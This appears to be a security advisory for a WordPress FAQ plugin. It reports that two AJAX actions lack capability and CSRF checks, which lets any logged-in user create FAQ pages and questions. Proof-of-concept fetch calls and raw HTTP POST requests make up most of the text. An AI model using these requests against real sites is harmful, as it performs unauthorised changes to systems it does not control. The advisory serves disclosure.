The plugin does not have capability and CSRF checks in the ewd_ufaq_welcome_add_faq and ewd_ufaq_welcome_add_faq_page AJAX actions, available to any authenticated users. As a result, any users, with a role as low as Subscriber could create FAQ and FAQ questions
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"ewd_ufaq_welcome_add_faq_page", "faq_page_title": "hello"}),
"method": "POST",
"credentials": "include"
});
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Cookie: [any authenticated user]
action=ewd_ufaq_welcome_add_faq_page&faq_page_title=hello
The FAQ will be created as a page (/wp-admin/edit.php?post_type=page&orderby=date&order=desc)
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"ewd_ufaq_welcome_add_faq", "faq_question": "Have you ever heard the wolf cry to the blue corn moon?", "faq_answer": "Yes"}),
"method": "POST",
"credentials": "include"
});
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 117
Connection: close
Cookie: [any authenticated user]
action=ewd_ufaq_welcome_add_faq&faq_question=Have+you+ever+heard+the+wolf+cry+to+the+blue+corn+moon%3F&faq_answer=Yes